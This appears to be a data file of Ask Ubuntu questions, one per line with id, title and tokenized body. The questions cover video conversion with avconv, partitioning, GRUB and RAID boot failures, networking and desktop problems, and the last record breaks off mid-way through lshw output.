262163	converting from mp4 to xvid avi using avconv ?	i normally use avidemux to convert mp4s to xvid avi for my philips streamium slm5500 . normally i select mpeg-4 asp ( xvid ) at two pass with an average bitrate f 1500kb/s for video and ac3 ( lav ) audio and it converts correctly . however , i 'm trying to using avconv so i can automate the process with a script , but when i do this the video stutters and stops playing part way through . i have a suspicion its something to do with a faulty audio conversion . the commands i 'm using are as follows : avconv -y -i video.mp4 -pass 1 -vtag xvid -c : a ac3 -b : a 128k -b : v 1500k -f avi /dev/null avconv -y -i video.mp4 -pass 2 -vtag xvid -c : a ac3 -b : a 128k -b : v 1500k -f avi video.avi there is a bewildering array of arguments for avconv . is there something i 'm doing wrong ? is there a way i can script avidemux from a headless server ? please see command line output : $ avconv -y -i video.mp4 -pass 1 -vtag xvid -an -b : v 1500k -f avi /dev/null avconv version 0.8.5-6:0.8.5-0ubuntu0.12.10.1 , copyright ( c ) 2000-2012 the libav developers built on jan 24 2013 14:49:20 with gcc 4.7.2 input # 0 , mov , mp4 , m4a,3gp,3g2 , mj2 , from 'video.mp4 ' : metadata : major_brand : isom minor_version : 1 compatible_brands : isomavc1 creation_time : 2013-02-04 13:53:38 duration : 00:44:09.16 , start : 0.000000 , bitrate : 669 kb/s stream # 0.0 ( und ) : video : h264 ( high ) , yuv420p , 720x404 [ par 1:1 dar 180:101 ] , 538 kb/s , 25 fps , 25 tbr , 100 tbn , 50 tbc metadata : creation_time : 2013-02-04 13:53:38 stream # 0.1 ( und ) : audio : ac3 , 44100 hz , stereo , s16 , 127 kb/s metadata : creation_time : 2013-02-04 13:53:42 [ buffer @ 0x7f4c40 ] w:720 h:404 pixfmt : yuv420p output # 0 , avi , to '/dev/null ' : metadata : major_brand : isom minor_version : 1 compatible_brands : isomavc1 creation_time : 2013-02-04 13:53:38 isft : lavf53.21.1 stream # 0.0 ( und ) : video : mpeg4 , yuv420p , 720x404 [ par 1:1 dar 180:101 ] , q=2-31 , pass 1 , 1500 kb/s , 25 tbn , 25 tbc metadata : creation_time : 2013-02-04 13:53:38 stream mapping : stream # 0:0 - > # 0:0 ( h264 - > mpeg4 ) press ctrl-c to stop encoding frame=66227 fps=328 q=2.0 lsize= 0kb time=2649.16 bitrate= 0.0kbits/s video:401602kb audio:0kb global headers:0kb muxing overhead -100.000000 % $ avconv -y -i video.mp4 -pass 2 -vtag xvid -c : a ac3 -b : a 128k -b : v 1500k -f avi video.avi avconv version 0.8.5-6:0.8.5-0ubuntu0.12.10.1 , copyright ( c ) 2000-2012 the libav developers built on jan 24 2013 14:49:20 with gcc 4.7.2 input # 0 , mov , mp4 , m4a,3gp,3g2 , mj2 , from 'video.mp4 ' : metadata : major_brand : isom minor_version : 1 compatible_brands : isomavc1 creation_time : 2013-02-04 13:53:38 duration : 00:44:09.16 , start : 0.000000 , bitrate : 669 kb/s stream # 0.0 ( und ) : video : h264 ( high ) , yuv420p , 720x404 [ par 1:1 dar 180:101 ] , 538 kb/s , 25 fps , 25 tbr , 100 tbn , 50 tbc metadata : creation_time : 2013-02-04 13:53:38 stream # 0.1 ( und ) : audio : ac3 , 44100 hz , stereo , s16 , 127 kb/s metadata : creation_time : 2013-02-04 13:53:42 [ buffer @ 0x12b4f00 ] w:720 h:404 pixfmt : yuv420p incompatible sample format 's16 ' for codec 'ac3 ' , auto-selecting format 'flt' [ mpeg4 @ 0x12b3ec0 ] [ lavc rc ] using all of requested bitrate is not necessary for this video with these parameters . output # 0 , avi , to 'video.avi ' : metadata : major_brand : isom minor_version : 1 compatible_brands : isomavc1 creation_time : 2013-02-04 13:53:38 isft : lavf53.21.1 stream # 0.0 ( und ) : video : mpeg4 , yuv420p , 720x404 [ par 1:1 dar 180:101 ] , q=2-31 , pass 2 , 1500 kb/s , 25 tbn , 25 tbc metadata : creation_time : 2013-02-04 13:53:38 stream # 0.1 ( und ) : audio : ac3 , 44100 hz , stereo , flt , 128 kb/s metadata : creation_time : 2013-02-04 13:53:42 stream mapping : stream # 0:0 - > # 0:0 ( h264 - > mpeg4 ) stream # 0:1 - > # 0:1 ( ac3 - > ac3 ) press ctrl-c to stop encoding input stream # 0:1 frame changed from rate:44100 fmt : s16 ch:2 to rate:44100 fmt : flt ch:2 frame=66227 fps=284 q=2.2 lsize= 458486kb time=2649.13 bitrate=1417.8kbits/s video:413716kb audio:41393kb global headers:0kb muxing overhead 0.741969 %
262164	ubuntu 12.10 help configuring eclipse 4.2.1 for pydev plugin 32bit resolved	trying to run 'hello world '' py file , so i installed eclipse and i cant seem to get the py file i select to run . jdk 7 crashed with a sigbus error .
262166	is my hardware not compatible ?	i have a fx4100 a radeon 6670 a gigabyte moboard and 8 gb of dddr3 ram . the failure occurs once i attempt to log in to my account . is the hardware causing the problem ? it 's a diy build so i can change whatever . thanks
262179	how to make main partition larger ?	i 'm running linux through virtualbox on windows 7 . when i created the virtual hard drive i only used the default size which is 8 gb . i was able to resize the virtual hard drive to 40 gb but in linux there 's still very little space . so i got a gparted live cd and booted the virtual machine into gparted to see if i could somehow add or resize the main partition . the extended/swap partition is in the way of the un-allocated space and the main boot partition , which is what i am wanting to add on to . so i can update or download more programs without running out of space . right now i am just confused on how to do this .
262181	can not set default gateway to specific lan	recently , i am trying to add a default gateway to my ubuntu machine to be able to send/receive packets from an another lan through the router . however , everything i do the result is the following : vag @ ubuntu : ~ $ route -n kernel ip routing table destination gateway genmask flags metric ref use iface 192.168.141.0 0.0.0.0 255.255.255.0 u 1 0 0 eth0 x.y.z.w 0.0.0.0 255.255.0.0 u 1000 0 0 eth0 0.0.0.0 192.168.141.2 0.0.0.0 ug 0 0 0 eth0 what i am trying to do ( at least i think ) is to create a line with the given information 192.168.20.0 192.168.1.254 255.255.255.0 xx xxx xxxx xxxx i do n't want to have connection on the internet and this is what i think 0.0.0.0 destination and gateway represent in the above table . i want just to connect to the lan . any ideas ?
262186	url is redirecting to https ?	i installed ssl ( stupidly ) to encrypt the data being sent , the only trouble was my subdomain was redirecting to my main . i changed my default virtual host back to the original settings and also ran a2dismod ssl . now when ever i type in www.domain.com it redirects to https : //www.domain.com and then says ssl connection error . i 'm hoping to either get ssl working on the main+sub or just remove completely . has anyone got any idea why it 's redirecting to https ? my virtualhosts file is : < virtualhost *:80 > servername www.domain.com documentroot /var/www/folder # sslengine on # sslcertificationfile /etc/apache2/ssl/apache.crt # sslcertificationkeyfile /etc/apache2/ssl/apache.key < /virtualhost > < virtualhost *:80 > servername sub.domain.com documentroot /var/www/sub # sslengine on # sslcertificationfile /etc/apache2/ssl/apache.crt # sslcertificationkeyfile /etc/apache2/ssl/apache.key < /virtualhost > now if i un-comment the lines with # on and change *:80 to *:443 it redirects to the main site with ssl enabled ...
262188	how can i encrypt the entire disk while installing ubuntu ?	i want to install ubuntu with encryption . this will damage my boot system ? will i need to remove my windows system ? how can i do that ? what version of ubuntu give me this feature ?
262191	3 finger multitouch - lenovo e530	i have started to try out some more from ubuntu as dualboot on my laptop ( lenovo e530 with 640m ) . in windows my touchpads gestures are working with three fingers to emulate back and forward ( in a browser for example ) which is awesome . in ubuntu i can use multitouch to scroll with two fingers both vertically and horizontal but gestures with more fingers aren’t working at all . i’ve got nvidia optimus working , my battery time , but i’m totally stuck at this . according to this link ( http : //www.omgubuntu.co.uk/2012/10/l ... -laptop-review ) they aren’t having some problems with multitouch . the questing is if they are just counting two-finger scroll . anyway , ubuntu has on their website ( https : //wiki.ubuntu.com/multitouch ) a guide how multitouch should work . and they also says that i just need to enable two-finger multitouch , the rest should work out-of-the box . if it’s working at all . anyone got some ideas ?
262192	indicator-brightness icon on panel ca n't change in radiance theme	i 'm referring to this indicator : there are no options to change the icon theme for the indicator on the panel , and the default color theme looks ugly on radiance theme . are there options i do n't know about or could settings be added ?
262193	inexplicable slowness	i 've been running ubuntu for about 4 years now , and i 'm having a problem with 12.04 every once in a while the computer will slow almost to a stop , interrupting any playing audio/video , and essentially becomes unusable for a minute or more . i keep checking the system monitor , but it shows me using less than half of my ram . i 've got swappiness on 10 , the suggested value for my 4gb ram . dell inspiron 1545 , intel dual core 2.1ghz . i 've checked out some of the other threads for help , but nothing seems to work . any help ?
262194	stream mixxx headphone output via icecast	just like the title . is it possible to configure mixxx and icecast in such a way that the headphone output is streamed ? ( instead of the master output ) how ? my laptop has only one sound card . i thought , maybe it 's possible to connect my phone ( via icecast ? ) to the headphone output . that way , i can use my phone 's output ( by listening to the icecast stream ) to pre-listen and use the laptop audio out as master . i do n't think doing the opposite ( master over icecast on the phone , pre-listen via the laptop audio out ) would be such a great idea , as streaming is inherently unreliable and i do n't want to put the master over an unreliable connection . and then there 's the latency . pre-listening with all these flaws seems to be less of a problem to me ( it just does n't work in the worst case , and then the master is unaffected ) . another solution to do something like this would also be accepted . as long as it makes it possible to reliably do pre-listening with an extra audio output . i 've quickly looked at possibly using the mic as output but that seems far too much trouble : using microphone input port as headphone output how do i get my laptop 's line in inlet to output sound ? but if someone knows , it 'd be the best solution . i have a thinkpad t60 .
262195	how to fix broken workspace switcher ?	my workspace switcher gets broken after each upgrade . it does not have the orange glow around active workspace . also there is no shadow on the inactive ones ( wallpaper does not get greyed out ) . it works fine in guest session so it has to be related to some config files . reinstalling does not help . i once deleted most config files and it got back to normal but i 'm not sure which files are the culprit . has anyone experienced this ? it has happened to me on multiple machines and in a virtualbox guest running on windows .
262202	installer ( liveusb ubuntu 12.10 ) do n't detect windows 8 preinstalled acer aspire v3-571g-9686	i 'm trying to install ubuntu on a acer aspire v3-571g-9686 , this but i 've not been able to do it . becuase the installer do not detect any operative systems previously installed ( in my case windows 8 ) here a list of what i have tried/do : 1- create a liveusb with ubuntu 12.10 2- turn off the fast startup option on the windows power management tool . 3- change the boot order to 1- > usb 2- > cd/dvd 3- > windows ( booting or something like that ) 4- put de flash drive in and restart . it recognizes the liveusb and i select `` try ubuntu '' , it works fine . but when i try to install ubuntu does not detect the existing w8 ( do n't show the `` install along side '' option ) . among other things i shrink one of the partitions on the hard drive , it looks like this https : //www.dropbox.com/s/d565eexewuqxk64/sin % 20t % c3 % adtulo.png the last partition seems to be a backup of w8 . the laptop came with a windows 8 preinstalled and i do n't want to lose it . acer aspire v3-571g-9686 intel core i7-3632qm / nvidia geforce gt640m / 8gb ram / 500 gb hdd
262203	ran a script in xubuntu and my display crashed . can someone advise on how to reverse it ?	i have a script i found a while back to speed up installing minecraft ... for my kid ... anyway , i recently changed to xubuntu and figured the same script would be ok , not taking into consideration the different desktop managers . when i ran the script , `` the application desktop closed unexpectedly '' and now i just have a grey desktop . im running xubuntu 12.04 64 bit with an ati graphics card and ati drivers . if any other info is needed please ask away . i hope someone knows how i can reverse the script ( below ) . thanks . echo -ne `` writing bin shell '' # this writes a seperate shell script in the /usr/local/bin folder , this is what allows the user # to run minecraft from terminal , just by typing minecraft . dots if [ ! -e /usr/local/bin/minecraft ] then touch minecraft echo java -jar /home/ $ ( whoami ) /.minecraft/minecraft.jar > > minecraft echo -ne saving to usr/local/bin dots echo this requires root access : sudo cp minecraft /usr/local/bin/ cd / cd /usr/local/bin sudo chmod +x minecraft echo `` done '' else echo excecutable already written fi echo `` '' # -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- echo -ne writing desktop shortcut dots cd /home/ $ ( whoami ) /.minecraft/ if [ -e /home/ $ ( whoami ) /.minecraft/install_files ] then echo -ne previous version detected , updating dots rm -rf install_files fi mkdir install_files cd install_files touch alloc-installer.desktop echo `` [ desktop entry ] '' > > alloc-installer.desktop echo `` type=application '' > > alloc-installer.desktop echo `` encoding=utf-8 '' > > alloc-installer.desktop echo `` name=minecraft '' > > alloc-installer.desktop echo `` comment=awesome game '' > > alloc-installer.desktop echo exec= java -jar /home/ $ ( whoami ) /.minecraft/minecraft.jar > > alloc-installer.desktop echo icon= /home/ $ ( whoami ) /.minecraft/icon.png > > alloc-installer.desktop echo categories=game > > alloc-installer.desktop echo `` terminal=false '' > > alloc-installer.desktop # -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- echo -ne granting the shortcut excecution permissions dots echo this requires root access cp alloc-installer.desktop /home/ $ ( whoami ) /desktop sudo chmod +x /home/ $ ( whoami ) /desktop/alloc-installer.desktop echo `` done '' echo `` '' # -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - echo -ne writing menu item dots touch alloc-menu.directory echo [ desktop entry ] > > alloc-menu.directory echo value=1.0 > > alloc-menu.directory echo type=directory > > alloc-menu.directory echo encoding=utf-8 > > alloc-menu.directory echo `` done '' echo `` '' echo -ne installing to applications menu dots xdg-desktop-menu install alloc-menu.directory alloc-installer.desktop xdg-desktop-menu forceupdate echo installed # -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- echo `` '' echo `` success ! '' echo `` '' echo -e `` minecraft has been successfully downloaded and installed \ncheck your desktop and applications menu for launchers ! \nyou can also run it from terminal with a 'minecraft ' command ! \ncontact : alloc @ dr.com '' echo `` happy mining ! '' echo '' '' edit : thanks mik . i tried running xfwm4 -- replace ( with sudo ) and got this : ` ( xfwm4:2025 ) : glib-critical ** : g_str_has_prefix : assertion `prefix ! = null ' failed ( xfwm4:2025 ) : xfwm4-warning ** : the property '/general/double_click_distance ' of type int is not supported ( xfwm4:2025 ) : glib-warning ** : ( /build/buildd/glib2.0-2.32.3/./glib/gerror.c:390 ) : g_error_new_valist : runtime check failed : ( domain ! = 0 ) ( xfwm4:2025 ) : xfwm4-warning ** : failed to connect to session manager : failed to connect to the session manager : session_manager environment variable not defined` still have the grey screen though . probably going to reinstall tomorrow , unless any of the above gives you any other clues ?
262207	`` error : unknown filesystem grub rescue '' rescuing my old backup	i 'm not working with ubuntu any more , but i figured since my uninstalling ubuntu caused this , i figured the community could help me . ubuntu 32-bit was not working in multiple areas for me , and i could not find any fixes , so i came to the decision to uninstall ubuntu 12.10 32-bit . i went to my windows 7 partition like normal , opened my partitions , and deleted the partition that had ubuntu on it . big mistake on my part . i was unaware that the ubuntu partition held the grub boot-up files . so after i restarted my computer , i got the following black screen error : error : unknown filesystem grub rescue > i googled this issue and discovered that there was no way to fix it but to reinstall my original operating system , windows 7 . i 'm all right with doing that -- i know how to burn an iso image to a cd -- but i just have one question . will i be able to access and retrieve my backup that i made a few days ago on windows 7 ? my family has pictures ( about 10 gb worth ) on there that we ca n't replace . any help would be appreciated .
262211	how do i resize an encrypted lvm to install another copy of ubuntu ?	i have an old powerbook which has been happily running ubuntu server for a few months . now i want to repartition the hard drive and install ubuntu client , while keeping my existing installation intact . when i first installed ubuntu , i chose to erase the entire hard drive and use it as an encrypted lvm . now , the installer seems to recognize the partitions on the drive , but it never prompts me for the password to the lvm . how do i make room for another installation alongside my current one ?
262214	unable to install ubuntu on hp envy dv4-5220us ( pre-installed windows 8 )	i just bought a new hp envy dv4 5220us laptop with preinstalled windows 8 . the first thing i did was format the hd remove all secure boot/uefi options in the bios and - after a futile attempt at installing windows 7 - re-installed windows 8 professional . i mainly use ubuntu ( 99 % of the time ) so it is very important for me to get it running on this pc . however , when i try running the installer for 12.10 i get the black screen issue , and if i use the `` nomodeset '' method , i still do n't get to the installation questions . the strange thing is that when i launch the computer now , i get the choice between windows and ubuntu , as if it were installed ( which it might be ? ) , not in grub , but in windows 8 , but if i select ubuntu i go into black screen , or , with `` nomodeset '' , it stalls after a few seconds of script . i 'm very ignorant in all these things , but i 'm computer savvy , so i got to all these things by following the forums . however , i do n't seem to find anything similar to the problem i 'm having . btw - i tried to return the pc today , but because of some stupid fine print i ca n't , so i 'm stuck with it , so i really want this to work . thanks , julian
262216	ubuntu not booting after installing in external hard disk	i have lenovo z570 laptop with 750gb hdd , 6gb ram , intel i5 processor and windows 7 installed in it . i also have an external portable usb hard-disk of 1tb . my aim was to install ubuntu 12.10 onto the external hard disk including grub boot loader onto it too . i use my external hard disk to store my backup data . in order to install linux onto it i made some free space in the hard about 50 gb using windows partition tool . i successfully did it without loosing any data . then i downloaded ubuntu 12.10 32bit iso , made an boot-able usb , and i booted into ubuntu successfully . i then went on with installing ubuntu . i carefully selected my 1tb external hard disk found out the free space i had created earlier , and made 4 partition on it 1 . \boot ext4 1024 mb 2 . \ ext4 5120 mb 3. swap 6144 mb 4 . \home ext4 32768 mb and i selected \boot partition to install grub into it . and everything went on smoothly . when i restarted the computer after installing ubuntu it directly loaded windows 7 . so i restarted it , changed the boot priority to usb hdd and when i booted into it , it showed the next error : ntldr missing press ctrl+alt+del to restart
262219	does maas 1.2 have a built-in tftp server ?	i am trying maas 1.2 on 12.10 . however as declared it conflicts with tftpd-hpa . my question is does it contain a built-in tftp ? i tried to install tftpd-hpa on another node , but there is no pxelinx.cfg dir in /var/lib/tftpd . in 12.04 with maas 0.1 everything is ready , including tftp and cfgs . moreover , nothing is mentioned on `` http : //maas.ubuntu.com/docs/install.html '' . could anyone give some hints ? thanks !
262221	partitioning : moving an extended partition ( containing / and swap ) to extend another partition	take a look at my gparted screenshot below : as you can see my sda3 primary partition is separated by the extended partition that contains my / and swap logical partitions . i 'd like to move sda3 to be adjacent with unallocated to extend it . after some reading , the only potential issue i can find has something to do with /boot , which is located in sda1 so it should n't be a problem ( right ? ) ! my question is : is it safe ? any issues i need to be worried about ? more importantly : can anyone point me in the right direction ? maybe pointers/step-by-step instructions ? thanks in advance ! ps : i know my partitioning is a little bit weird ( newbie here ) . i 'm planning on shrinking root and merging it with sda3 : )
262225	command line not working ?	so , i just installed ubuntu on my macbook pro ( dual-boot ) and i noticed that i could n't see my other hard drive ( i partitioned ~40gb just for ubuntu , but i obviously do n't want to install programs on that ) . so i opened up the command console and typed `` sudo fdisk -l '' . i got `` invalid option -- '1 ' '' when doing this . am i doing something wrong ? it wo n't let me list my drives as apparently that is n't a real option ? thanks !
262226	boot failure after upgrade /dev/mapper/isw ... volume01 does not exist	i upgraded to 12.04 and now my system wo n't boot . it complains about /dev/mapper/isw ... volume01 does not exist and drops me to busybox . cat /proc/cmdline tells me it is indeed trying volume01 . dmraid -ay tells me that that the volumes that exist are already active . i 'll try to be as precise as i can so the next guy does n't get as lost as i did . i have no idea how to interpret anything and it took me a lot of searching to get this far . from the live cd , i could see my drive . first , i had to open my file browser and click on my drive so that it mounted . then i found a script called bootinfoscript ( sorry , i lost the link , livecd does not hold bookmarks well ) . i downloaded it , and opened another folder ( right-click on the folder icon ) to my downloads , double click it to unpack and save in my hard drive 's /tmp folder . reboot and remove the cd to get back to the busybox . mkdir /mnt mount /dev/mapper/randomnamevolume0p1 /mnt -- i tried all the files here until one worked mdadm -- examine -- scan -- config=mdadm.con > /mnt/tmp/mdadm.txt dmraid -r > /mnt/tmp/dmraid.txt ls -l /dev/mapper > mapper.txt chroot /mnt mount /proc cd /tmp cat /proc/partitions | strings > partitions.txt dmesg | grep sd [ ab ] > dmesg.txt lshw > lshw.txt ./bootinfoscript ^d exit reboot to the livecd , open my folder to my hard disk , go to the tmp folder , double click on the txt files i created and copy/paste the info dmraid.txt /dev/sdb : isw , `` isw_bhibhcjiba '' , group , ok , 976773166 sectors , data @ 0 /dev/sda : isw , `` isw_bhibhcjiba '' , group , ok , 976773166 sectors , data @ 0 mapper.txt crw -- -- -- - 1 10 , 236 control lrwxrwxrwx 1 7 isw_bhibhcjiba_volume0 - > ../dm-0 lrwxrwxrwx 1 7 isw_bhibhcjiba_volume0p5 - > ../dm-3 lrwxrwxrwx 1 7 isw_bhibhcjiba_volume0p1 - > ../dm-1 lrwxrwxrwx 1 7 isw_bhibhcjiba_volume0p2 - > ../dm-2 partitions.txt major minor # blocks name 8 0 488386584 sda 8 16 488386584 sdb 11 0 1048575 sr0 252 0 488383620 dm-0 252 1 468575856 dm-1 252 2 19800112 dm-2 252 3 19800081 dm-3 dmesg.txt [ 1.331382 ] sd 0:0:0:0 : [ sda ] 976773168 512-byte logical blocks : ( 500 gb/465 gib ) [ 1.331446 ] sd 0:0:0:0 : [ sda ] write protect is off [ 1.331449 ] sd 0:0:0:0 : [ sda ] mode sense : 00 3a 00 00 [ 1.331487 ] sd 0:0:0:0 : [ sda ] write cache : enabled , read cache : enabled , does n't support dpo or fua [ 1.373526 ] sda : sda1 sda2 < sda5 > [ 1.373868 ] sd 0:0:0:0 : [ sda ] attached scsi disk [ 2.142733 ] sd 2:0:0:0 : [ sdb ] 976773168 512-byte logical blocks : ( 500 gb/465 gib ) [ 2.142775 ] sd 2:0:0:0 : [ sdb ] write protect is off [ 2.142778 ] sd 2:0:0:0 : [ sdb ] mode sense : 00 3a 00 00 [ 2.142796 ] sd 2:0:0:0 : [ sdb ] write cache : enabled , read cache : enabled , does n't support dpo or fua [ 2.191869 ] sdb : sdb1 sdb2 < sdb5 > [ 2.192188 ] sd 2:0:0:0 : [ sdb ] attached scsi disk lshw.txt _none_ description : desktop computer product : system product name ( to be filled by o.e.m . ) vendor : system manufacturer version : system version serial : system serial number width : 64 bits capabilities : smbios-2.5 dmi-2.5 vsyscall32 configuration : boot=normal chassis=desktop family=to be filled by o.e.m . sku=to be filled by o.e.m . uuid=a0df001e-8c00-00c5-d544-e0cb4e54d129 *-core description : motherboard product : p5q-em do vendor : asustek computer inc. physical id : 0 version : rev 1.xx serial : 103168810001969 slot : to be filled by o.e.m . *-firmware description : bios vendor : american megatrends inc. physical id : 0 version : 1102 date : 05/27/2009 size : 64kib capacity : 1984kib capabilities : isa pci pnp apm upgrade shadowing escd cdboot bootselect socketedrom edd int13floppy1200 int13floppy720 int13floppy2880 int5printscreen int9keyboard int14serial int17printer int10video acpi usb ls120boot zipboot biosbootspecification *-cpu description : cpu product : intel ( r ) core ( tm ) 2 quad cpu q8400 @ 2.66ghz vendor : intel corp. physical id : 4 bus info : cpu @ 0 version : intel ( r ) core ( tm ) 2 quad cpu q8400 @ 2.66ghz serial : to be filled by o.e.m . slot : lga 775 size : 2666mhz capacity : 3800mhz width : 64 bits clock : 333mhz capabilities : x86-64 fpu fpu_exception wp vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe syscall nx constant_tsc arch_perfmon pebs bts rep_good nopl aperfmperf pni dtes64 monitor ds_cpl vmx est tm2 ssse3 cx16 xtpr pdcm sse4_1 xsave lahf_lm dtherm tpr_shadow vnmi flexpriority configuration : cores=4 enabledcores=4 threads=4 *-cache:0 description : l1 cache physical id : 5 slot : l1-cache size : 128kib capacity : 128kib capabilities : internal write-back data *-cache:1 description : l2 cache physical id : 6 slot : l2-cache size : 4mib capacity : 4mib capabilities : internal write-back unified *-memory description : system memory physical id : 37 slot : system board or motherboard size : 8gib *-bank:0 description : dimm ddr2 synchronous 800 mhz ( 1.2 ns ) product : modulepartnumber00 vendor : manufacturer00 physical id : 0 serial : sernum00 slot : dimm0 size : 4gib width : 64 bits clock : 800mhz ( 1.2ns ) *-bank:1 description : dimm [ empty ] product : modulepartnumber01 vendor : manufacturer01 physical id : 1 serial : sernum01 slot : dimm1 *-bank:2 description : dimm ddr2 synchronous 800 mhz ( 1.2 ns ) product : modulepartnumber02 vendor : manufacturer02 physical id : 2 serial : sernum02 slot : dimm2 size : 4gib width : 64 bits clock : 800mhz ( 1.2ns ) *-bank:3 description : dimm [ empty ] product : modulepartnumber03 vendor : manufacturer03 physical id : 3 serial : sernum03 slot : dimm3 *-pci description : host bridge product : 4 series chipset dram controller vendor : intel corporation physical id : 100 bus info : pci @ 0000:00:00.0 version : 03 width : 32 bits clock : 33mhz *-pci:0 description : pci bridge product : 4 series chipset pci express root port vendor : intel corporation physical id : 1 bus info : pci @ 0000:00:01.0 version : 03 width : 32 bits clock : 33mhz capabilities : pci pm msi pciexpress normal_decode bus_master cap_list *-display unclaimed description : vga compatible controller product : rv710 [ radeon hd 4350 ] vendor : hynix semiconductor ( hyundai electronics ) physical id : 0 bus info : pci @ 0000:01:00.0 version : 00 size : 256mib width : 64 bits clock : 33mhz capabilities : pm pciexpress msi vga_controller bus_master cap_list configuration : latency=0 resources : iomemory : d0000000-dfffffff iomemory : fe9e0000-fe9effff ioport : d000 ( size=256 ) irq:10 *-multimedia unclaimed description : audio device product : rv710/730 hdmi audio [ radeon hd 4000 series ] vendor : hynix semiconductor ( hyundai electronics ) physical id : 0.1 bus info : pci @ 0000:01:00.1 version : 00 width : 64 bits clock : 33mhz capabilities : pm pciexpress msi bus_master cap_list configuration : latency=0 resources : iomemory : fe9fc000-fe9fffff irq:11 *-communication unclaimed description : communication controller product : 4 series chipset heci controller vendor : intel corporation physical id : 3 bus info : pci @ 0000:00:03.0 version : 03 width : 64 bits clock : 33mhz capabilities : pm msi bus_master cap_list configuration : latency=0 resources : iomemory : fe8ff000-fe8ff00f irq:10 *-network disabled description : ethernet interface product : 82567lm-3 gigabit network connection vendor : intel corporation physical id : 19 bus info : pci @ 0000:00:19.0 logical name : eth0 version : 02 serial : e0 : cb:4e:54 : d1:29 size : 1gbit/s capacity : 1gbit/s width : 32 bits clock : 33mhz capabilities : pm msi bus_master cap_list ethernet physical tp 10bt 10bt-fd 100bt 100bt-fd 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=e1000e driverversion=1.5.1-k duplex=full firmware=0.4-3 latency=0 link=no multicast=yes port=twisted pair speed=1gbit/s resources : iomemory : fe8c0000-fe8dffff iomemory : fe8fe000-fe8fefff ioport : cc00 ( size=32 ) irq:48 *-usb:0 unclaimed description : usb controller product : 82801jd/do ( ich10 family ) usb uhci controller # 4 vendor : intel corporation physical id : 1a bus info : pci @ 0000:00:1a.0 version : 02 width : 32 bits clock : 33mhz capabilities : uhci bus_master cap_list configuration : latency=0 resources : ioport : c480 ( size=32 ) irq:16 *-usb:1 unclaimed description : usb controller product : 82801jd/do ( ich10 family ) usb uhci controller # 5 vendor : intel corporation physical id : 1a.1 bus info : pci @ 0000:00:1a.1 version : 02 width : 32 bits clock : 33mhz capabilities : uhci bus_master cap_list configuration : latency=0 resources : ioport : c800 ( size=32 ) irq:21 *-usb:2 unclaimed description : usb controller product : 82801jd/do ( ich10 family ) usb uhci controller # 6 vendor : intel corporation physical id : 1a.2 bus info : pci @ 0000:00:1a.2 version : 02 width : 32 bits clock : 33mhz capabilities : uhci bus_master cap_list configuration : latency=0 resources : ioport : c880 ( size=32 ) irq:18 *-usb:3 unclaimed description : usb controller product : 82801jd/do ( ich10 family ) usb2 ehci controller # 2 vendor : intel corporation physical id : 1a.7 bus info : pci @ 0000:00:1a.7 version : 02 width : 32 bits clock : 33mhz capabilities : pm debug ehci bus_master cap_list configuration : latency=0 resources : iomemory : fe8fd000-fe8fd3ff irq:18 *-multimedia unclaimed description : audio device product : 82801jd/do ( ich10 family ) hd audio controller vendor : intel corporation physical id : 1b bus info : pci @ 0000:00:1b.0 version : 02 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list configuration : latency=0 resources : iomemory : fe8f4000-fe8f7fff irq:3 *-pci:1 description : pci bridge product : 82801jd/do ( ich10 family ) pci express port 1 vendor : intel corporation physical id : 1c bus info : pci @ 0000:00:1c.0 version : 02 width : 32 bits clock : 33mhz capabilities : pci pciexpress msi pm normal_decode bus_master cap_list *-pci:2 description : pci bridge product : 82801jd/do ( ich10 family ) pci express port 5 vendor : intel corporation physical id : 1c.4 bus info : pci @ 0000:00:1c.4 version : 02 width : 32 bits clock : 33mhz capabilities : pci pciexpress msi pm normal_decode bus_master cap_list *-ide unclaimed description : ide interface product : 88se6101/6102 single-port pata133 interface vendor : marvell technology group ltd. physical id : 0 bus info : pci @ 0000:02:00.0 version : c0 width : 32 bits clock : 33mhz capabilities : ide pm msi pciexpress bus_master cap_list configuration : latency=0 resources : ioport : ec00 ( size=8 ) ioport : e880 ( size=4 ) ioport : e800 ( size=8 ) ioport : e480 ( size=4 ) ioport : e400 ( size=16 ) iomemory : feaff000-feaff1ff irq:16 *-usb:4 unclaimed description : usb controller product : 82801jd/do ( ich10 family ) usb uhci controller # 1 vendor : intel corporation physical id : 1d bus info : pci @ 0000:00:1d.0 version : 02 width : 32 bits clock : 33mhz capabilities : uhci bus_master cap_list configuration : latency=0 resources : ioport : c000 ( size=32 ) irq:23 *-usb:5 unclaimed description : usb controller product : 82801jd/do ( ich10 family ) usb uhci controller # 2 vendor : intel corporation physical id : 1d.1 bus info : pci @ 0000:00:1d.1 version : 02 width : 32 bits clock : 33mhz capabilities : uhci bus_master cap_list configuration : latency=0 resources : ioport : c080 ( size=32 ) irq:19 *-usb:6 unclaimed description : usb controller product : 82801jd/do ( ich10 family ) usb uhci controller # 3 vendor : intel corporation physical id : 1d.2 bus info : pci @ 0000:00:1d.2 version : 02 width : 32 bits clock : 33mhz capabilities : uhci bus_master cap_list configuration : latency=0 resources : ioport : c400 ( size=32 ) irq:18 *-usb:7 unclaimed description : usb controller product : 82801jd/do ( ich10 family ) usb2 ehci controller # 1 vendor : intel corporation physical id : 1d.7 bus info : pci @ 0000:00:1d.7 version : 02 width : 32 bits clock : 33mhz capabilities : pm debug ehci bus_master cap_list configuration : latency=0 resources : iomemory : fe8fc000-fe8fc3ff irq:23 *-pci:3 description : pci bridge product : 82801 pci bridge vendor : intel corporation physical id : 1e bus info : pci @ 0000:00:1e.0 version : a2 width : 32 bits clock : 33mhz capabilities : pci subtractive_decode bus_master cap_list *-firewire unclaimed description : firewire ( ieee 1394 ) product : fw322/323 vendor : lsi corporation physical id : 3 bus info : pci @ 0000:04:03.0 version : 70 width : 32 bits clock : 33mhz capabilities : pm ohci bus_master cap_list configuration : latency=64 maxlatency=24 mingnt=12 resources : iomemory : febff000-febfffff irq:19 *-isa description : isa bridge product : 82801jdo ( ich10do ) lpc interface controller vendor : intel corporation physical id : 1f bus info : pci @ 0000:00:1f.0 version : 